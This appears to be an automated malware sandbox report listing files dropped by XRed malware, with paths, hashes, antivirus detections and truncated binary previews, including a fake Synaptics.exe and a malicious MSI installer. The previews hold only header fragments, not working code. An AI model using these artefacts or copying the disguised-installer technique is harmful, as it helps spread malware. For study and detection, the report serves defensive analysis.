                                                                                                                                        Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="pbQuFvqN3mjjbYjIGc1gYw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):1652
                                                                                                                                        Entropy (8bit):5.262263502263181
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:24:GgsF+0ZSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+6+pAZewRDK4mW
                                                                                                                                        MD5:3C07667021DA72939338E8229D800D8E
                                                                                                                                        SHA1:ECE789408909095F7D1D7C0133BF372D6DBC2AE5
                                                                                                                                        SHA-256:171C53A7067A3B382AAADCBC2A561934D5A8CB3EF314164936E8FBE2DB4323FE
                                                                                                                                        SHA-512:C675C902D0C7152AFE8FE7038734C083EAB23FB940311D04CE0F11B75F0B1CA4E0362AEF7301B9B4F5C2262A93B5795A6E6F138C2B099CC3A0C61D18F7ADB59A
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="DWbVWWaez3VSh5ul_YRQog">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                        File Type:data
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):165
                                                                                                                                        Entropy (8bit):1.5231029153786204
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:3:sYp5lFltt:sYp5Nv
                                                                                                                                        MD5:B77267835A6BEAC785C351BDE8E1A61C
                                                                                                                                        SHA1:FABD93A92989535D43233E3DB9C6579D8174740E
                                                                                                                                        SHA-256:3B222E766EADC8BC9A8A90AC32FA591F313545B7E8C5D481D378AE307FA798C3
                                                                                                                                        SHA-512:FFFCBA958E9BD56F284DA19592F124C48B013FCDA2FBE65B3EB38BB644C2B0C978E6DAE99EF213B054813C7212E119B09236A6FFF342D32E52C84DD26DE1E033
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:.user ..a.l.f.o.n.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):32768
                                                                                                                                        Entropy (8bit):3.746897789531007
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:192:QuY+pHkfpPr76TWiu0FPZK3rcd5kM7f+ihdCF3EiRcx+NSt0ckBCecUSaFUH:ZZpEhSTWi/ekfzaVNg0c4gU
                                                                                                                                        MD5:7426F318A20A187D88A6EC88BBB53BAF
                                                                                                                                        SHA1:4F2C80834F4B5C9FCF6F4B1D4BF82C9F7CCB92CA
                                                                                                                                        SHA-256:9AF85C0291203D0F536AA3F4CB7D5FBD4554B331BF4254A6ECD99FE419217830
                                                                                                                                        SHA-512:EC7BAA93D8E3ACC738883BAA5AEDF22137C26330179164C8FCE7D7F578C552119F58573D941B7BEFC4E6848C0ADEEF358B929A733867923EE31CD2717BE20B80
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        File Type:Microsoft Excel 2007+
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):18387
                                                                                                                                        Entropy (8bit):7.523057953697544
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                                                                                                        MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                                                                                                        SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                                                                                                        SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
                                                                                                                                        SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:PK..........!...5Qr...?.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-..@.5.....(..8...-.[.g.......M^..s.5.4.I..P;..!....r....}._.G.`....Y....M.7....&.m1cU..I.T.....`.t...^.Bx..r..~0x....6...`....reb2m.s.$.%...-*c.{...dT.m.kL]Yj.|..Yp..".G.......r...).#b.=.QN'...i..w.s..$3..)).....2wn..ls.F..X.D^K.......Cj.sx..E..n._ ....pjUS.9.....j..L...>".....w.... ....l{.sd*...G.....wC.F... D..1<..=...z.As.]...#l..........PK..........!..U0#....L......._rels/.rels ...(...............
                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                        File Type:data
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):165
                                                                                                                                        Entropy (8bit):1.5231029153786204
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:3:sYp5lFltt:sYp5Nv
                                                                                                                                        MD5:B77267835A6BEAC785C351BDE8E1A61C
                                                                                                                                        SHA1:FABD93A92989535D43233E3DB9C6579D8174740E
                                                                                                                                        SHA-256:3B222E766EADC8BC9A8A90AC32FA591F313545B7E8C5D481D378AE307FA798C3
                                                                                                                                        SHA-512:FFFCBA958E9BD56F284DA19592F124C48B013FCDA2FBE65B3EB38BB644C2B0C978E6DAE99EF213B054813C7212E119B09236A6FFF342D32E52C84DD26DE1E033
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:.user ..a.l.f.o.n.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):771584
                                                                                                                                        Entropy (8bit):6.638013190381294
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9ICXr:ansJ39LyjbJkQFMhmC+6GD9x
                                                                                                                                        MD5:ACA4D70521DE30563F4F2501D4D686A5
                                                                                                                                        SHA1:6C2BAA72EA5D08B6583893B01001E540213F4AAF
                                                                                                                                        SHA-256:449B6A3E32CEB8FC953EAF031B3E0D6EC9F2E59521570383D08DC57E5FFA3E19
                                                                                                                                        SHA-512:DA806BD4AC02C45C17ED5D050428B3E7B15E8F148ACB156CFB41EAB3E27C35FA91AB1A55D18C6EF488A82D3379ABF45421432E2EFAF2FAE4968C760D42215A7C
                                                                                                                                        Malicious:true
                                                                                                                                        Yara Hits:
                                                                                                                                        • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\Users\user\Documents\EEGWXUHVUG\~$cache1, Author: Joe Security
                                                                                                                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\Documents\EEGWXUHVUG\~$cache1, Author: Joe Security
                                                                                                                                        Antivirus:
                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                        • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................&....................@.......................... ...................@..............................B*...........................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                        File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, MSI Installer, Code page: 1252, Last Printed: Fri Sep 21 10:56:09 2012, Create Time/Date: Fri Sep 21 10:56:09 2012, Name of Creating Application: Windows Installer, Title: Exe to msi converter free, Author: www.exetomsi.com, Template: ;0, Last Saved By: devuser, Revision Number: {C35CF0AA-9B3F-4903-9F05-EBF606D58D3E}, Last Saved Time/Date: Tue May 21 12:56:44 2013, Number of Pages: 100, Number of Words: 0, Security: 0
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):1748992
                                                                                                                                        Entropy (8bit):7.422118768157554
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:49152:PElnsHyjtk2MYC5GD8hloJfCAh9RMUBrNUFqtBZl:Gnsmtk2a1hlPERBsiT
                                                                                                                                        MD5:53614B87538306B4F7437DB8BE2A0E47
                                                                                                                                        SHA1:A6A777B24BB64067738386CAA66787B8ED225726
                                                                                                                                        SHA-256:E86D059BD44BC6E4252972320CB811497EA87F3B0EF10EED5EDFCD7ACF44A3D8
                                                                                                                                        SHA-512:CFED71C6B9EB55B3EBFB53CBDB1611E8921A6DBE7B7EFC5456CEBB9BFB3D6A64F23A97C63415D61C38C4E3B540A79FD50CB2A080220BF3EA32EDC98F85E6ECC1
                                                                                                                                        Malicious:true
                                                                                                                                        Yara Hits:
                                                                                                                                        • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\Windows\Installer\674551.msi, Author: Joe Security
                                                                                                                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Windows\Installer\674551.msi, Author: Joe Security
                                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                        File Type:data
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):1724626
                                                                                                                                        Entropy (8bit):7.463577046908261
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:49152:HnsHyjtk2MYC5GD8hloJfCAh9RMUBrNUFqtBZl9:Hnsmtk2a1hlPERBsiTT
                                                                                                                                        MD5:B4BDB060CDA345A08B60F84B482C3AF0
                                                                                                                                        SHA1:5E7473901E4D47A9E1F69194D66D4D023E207E1D
                                                                                                                                        SHA-256:7D19D7E8D35CF4F3A30C04F1E9C2D5DFCBB115EC4C167128679B9CE941091AE3
                                                                                                                                        SHA-512:9B681CC41BEECC8F97D992E1F205026641C0EACEC75980D11C728991E179C7A1B705CCAC228857282AB1D9662D4E70C724EBAA98E08AF7535D39442DAF293E09
                                                                                                                                        Malicious:true
                                                                                                                                        Yara Hits:
                                                                                                                                        • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\Windows\Installer\MSI4699.tmp, Author: Joe Security
                                                                                                                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Windows\Installer\MSI4699.tmp, Author: Joe Security
                                                                                                                                        Preview:...@IXOS.@.....@.-.Y.@.....@.....@.....@.....@.....@......&.{29EF7317-DCA1-4159-97B2-C883AD400AC6}..Exe to msi converter free..valyzt.msi.@.....@.....@.....@........&.{C35CF0AA-9B3F-4903-9F05-EBF606D58D3E}.....@.....@.....@.....@.......@.....@.....@.......@......Exe to msi converter free......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration.....@.....@.....@.]....&.{4C231858-2B39-11D3-8E0D-00C04F6837D0}...@.......@.....@.....@........RemoveODBC..Removing ODBC components..T....@....T....@......%._B3D13F97_1369_417D_A477_B4C42B829328....J.%._B3D13F97_1369_417D_A477_B4C42B829328.@.......N..MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..............................
                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):1723904
                                                                                                                                        Entropy (8bit):7.463863136848696
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:49152:gnsHyjtk2MYC5GD8hloJfCAh9RMUBrNUFqtBZlO:gnsmtk2a1hlPERBsiTs
                                                                                                                                        MD5:71386F37F17778126296CA734975DB6D
                                                                                                                                        SHA1:353818DCD74D06565FC0E8AC4416E594D29ECD0B
                                                                                                                                        SHA-256:C1317DA0FD0DC3D73B38634EA586016F6F651F52ACC576FBAE8B82721C83E9AE
                                                                                                                                        SHA-512:E5E0D87F91611BCCFEA16222C9AFB7AC7B949F1762244CED01F9D8A78E2C992CFE8C1FAAF1391F4CF107604A0E9F7A64FA4ADDA1C339D8DC85B27E7BE610B83C
                                                                                                                                        Malicious:true
                                                                                                                                        Yara Hits:
                                                                                                                                        • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\Windows\Installer\MSI4755.tmp, Author: Joe Security
                                                                                                                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Windows\Installer\MSI4755.tmp, Author: Joe Security
                                                                                                                                        Antivirus:
                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                        • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..............................................@..............................B*......0....................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...0...........................@..P....................................@..P........................................................................................................................................
                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):20480
                                                                                                                                        Entropy (8bit):1.16265166967116
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:12:JSbX72FjiAGiLIlHVRpth/7777777777777777777777777vDHFwL2JpSl0i8Q:JIQI5pmAF
                                                                                                                                        MD5:04C773E74E0A3920F8C08920036ABAD8
                                                                                                                                        SHA1:2C81A7125D1FA3633622177E093064DD7B8FD15E
                                                                                                                                        SHA-256:394D8B9166C47E3D03EEA13F94989C02D9DB8B12FFC307E8F81907729C7EA85E
                                                                                                                                        SHA-512:6A0F33E676D88359C3B84F6BDD7545676A7E465402782CC9EBE77A4F110AB52FB57C6B453F73A40AC080CE508D2EDB820CAFEFF7FE45E72DA19B617F84D9923A
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):20480
                                                                                                                                        Entropy (8bit):1.4184193448562894
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:48:XR8PhkuRc06WXJejT54rvAaSzUpcSzfT:chk11jTmrvAaYZY
                                                                                                                                        MD5:017E75EA112E4BE5E18B8381D09C75C9
                                                                                                                                        SHA1:5F122F132B5FB049F079268A4DB16EA73A7A3CFE
                                                                                                                                        SHA-256:4F78D6EA7FF3284C54D0CA79A2DABBE2B04B5052F8806698D2969F564BA5AFE0
                                                                                                                                        SHA-512:6981E5EE7FCA9F2B415A1F45818AC219312FA324CB9CFCDE2CADDD16237CC070C7B1FC91940A831E1010324808591E3D01724ABEC661B33BCA4D75FACFA749BD
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):364484
                                                                                                                                        Entropy (8bit):5.365490317437716
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26KgauZ:zTtbmkExhMJCIpEO
                                                                                                                                        MD5:BABD5D7DD69EF3773E5A13C6AE48C5A1
                                                                                                                                        SHA1:07BE2C855EE09907D42F0DA48CFFCBF0BF7EFCA6
                                                                                                                                        SHA-256:88CC72FDCAAF6FC382305B3E996A68A3FEE6502DDC5B07B912481A6A7E069483
                                                                                                                                        SHA-512:52FEEDD0C8CF55C6510B20AF8DAF78EABB790CB2CE45234CAB795B12B7EBEA7DE77FFB8CF71B15507AA6884F8550AC3A6CE1EABD8740A308DD499068AA2C6B88
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [
                                                                                                                                        Process:C:\Windows\Installer\MSI4755.tmp
                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):952320
                                                                                                                                        Entropy (8bit):7.853882881449956
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:24576:ZhloDX0XOf4LvPAXY3+3NRMaqIL90KNUFmX1tqqNZlz:ZhloJfCAh9RMUBrNUFqtBZl
                                                                                                                                        MD5:36F4C5372C6391F782C2DB490081746F
                                                                                                                                        SHA1:A0B1EC84B0A2DB8F801981E247578217B71B38DA
                                                                                                                                        SHA-256:1FE023F69F42FCD4BE4BAA180BBFF00B7FFE51C553211DD0DF45FB7FF71148B8
                                                                                                                                        SHA-512:111C1915D81141398B6BB7A0AA0E98896FB05D5548ACE8FD1E0E23343EAE60EA1E3D6617D3F5F883B96C8E05F5F868A280683341810896C00FA6EF1F68338992
                                                                                                                                        Malicious:true
                                                                                                                                        Antivirus:
                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                        • Antivirus: ReversingLabs, Detection: 55%
                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.............g.........$.............%....H......X.2........q)..Z..q).....q).......\....q).....Rich...........................PE..L....Hng.........."......P...@...`.......p........@........................... ...........@...@.......@.....................\...$.......\;..............................................................H...........................................UPX0.....`..............................UPX1.....P...p...D..................@....rsrc....@.......@...H..............@..............................................................................................................................................................................................................................................................................................................................................................3.07.UPX!....
                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):32768
                                                                                                                                        Entropy (8bit):1.1472890586714402
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:24:JYYh+3AmMuxliEipKP2xza2tzhAzZZagUMClXtdd+idrv+4QaipVJ+ZVQwGmrkfy:mnLMuHJveFXJ5T5HrvAaSzUpcSzfT
                                                                                                                                        MD5:CA5663A6359E746C09FE3F8EFD2D33CF
                                                                                                                                        SHA1:1DDA0C2193301BC351FE45054D8EE008F24209BE
                                                                                                                                        SHA-256:F75723E126C41080DE93B129309F5E45E20F8AED253C1414176B673D1198304F
                                                                                                                                        SHA-512:E75AFBF59A2E5B3677241BA0CEAFFEA219251999C3B64A26B988BAC4F56CFC54196FCF068D04C4C7B0FD95A3998ECC01E49F43DC938CC04578A39ADB4FE43DE8
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                        File Type:data
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):69632
                                                                                                                                        Entropy (8bit):0.08583513603533954
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:12:5wW2syASClZvb+ipVJ+8lqipVJ+soVjfFJIiWlIC1nI2tpqsA5GnQbEo+kDWG2F1:ZPDvb+ipVJ+dipVJ+ZVQwGmrksJ+4br
                                                                                                                                        MD5:A3363BA1DC3002696ACCB1607ECEE57B
                                                                                                                                        SHA1:DFB1E95D17055701EEB55B50A37A0008F286D9E5
                                                                                                                                        SHA-256:C65BD0816F4A6AF926F870BC90D498A4B5EF9094610C65465D2BD6D8B97365CC
                                                                                                                                        SHA-512:FBED5B6C69ACC989724E1795BEEA94406B21A662F7470CAF0A031D4317A5623C33C89A5F44AB26E9C544649F3DBE8074F1D8CAF6F6B017AAAC5ED6B3FCD2EFC6
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                        File Type:data
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):32768
                                                                                                                                        Entropy (8bit):0.06943164993294329
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKOohjH1cs9mstQVky6lS:2F0i8n0itFzDHFwLVJS
                                                                                                                                        MD5:A82618852BEC8B2073A5B7BF7CA5D21F
                                                                                                                                        SHA1:16480A133FCD4D899E950BEDF182EEEAC82DB9FD
                                                                                                                                        SHA-256:8220F65A6F0E1FBA9941FB6465345114C0A519D66DFC10291FACB823B4689DE8
                                                                                                                                        SHA-512:9C5F68D1FA02ED3588D907A3B10D953707F1FDF78DEAC39D39389959388C8E0795CCADF45D4B990FB48200AB64A32A16E34E87EFCAC71C0E8084CDB040DB99B9
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                        File Type:data
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):512
                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:3::
                                                                                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                        File Type:data
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):512
                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:3::
                                                                                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):32768
                                                                                                                                        Entropy (8bit):1.1472890586714402
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:24:JYYh+3AmMuxliEipKP2xza2tzhAzZZagUMClXtdd+idrv+4QaipVJ+ZVQwGmrkfy:mnLMuHJveFXJ5T5HrvAaSzUpcSzfT
                                                                                                                                        MD5:CA5663A6359E746C09FE3F8EFD2D33CF
                                                                                                                                        SHA1:1DDA0C2193301BC351FE45054D8EE008F24209BE
                                                                                                                                        SHA-256:F75723E126C41080DE93B129309F5E45E20F8AED253C1414176B673D1198304F
                                                                                                                                        SHA-512:E75AFBF59A2E5B3677241BA0CEAFFEA219251999C3B64A26B988BAC4F56CFC54196FCF068D04C4C7B0FD95A3998ECC01E49F43DC938CC04578A39ADB4FE43DE8
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):32768
                                                                                                                                        Entropy (8bit):1.1472890586714402
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:24:JYYh+3AmMuxliEipKP2xza2tzhAzZZagUMClXtdd+idrv+4QaipVJ+ZVQwGmrkfy:mnLMuHJveFXJ5T5HrvAaSzUpcSzfT
                                                                                                                                        MD5:CA5663A6359E746C09FE3F8EFD2D33CF
                                                                                                                                        SHA1:1DDA0C2193301BC351FE45054D8EE008F24209BE
                                                                                                                                        SHA-256:F75723E126C41080DE93B129309F5E45E20F8AED253C1414176B673D1198304F
                                                                                                                                        SHA-512:E75AFBF59A2E5B3677241BA0CEAFFEA219251999C3B64A26B988BAC4F56CFC54196FCF068D04C4C7B0FD95A3998ECC01E49F43DC938CC04578A39ADB4FE43DE8
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                        File Type:data
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):512
                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:3::
                                                                                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
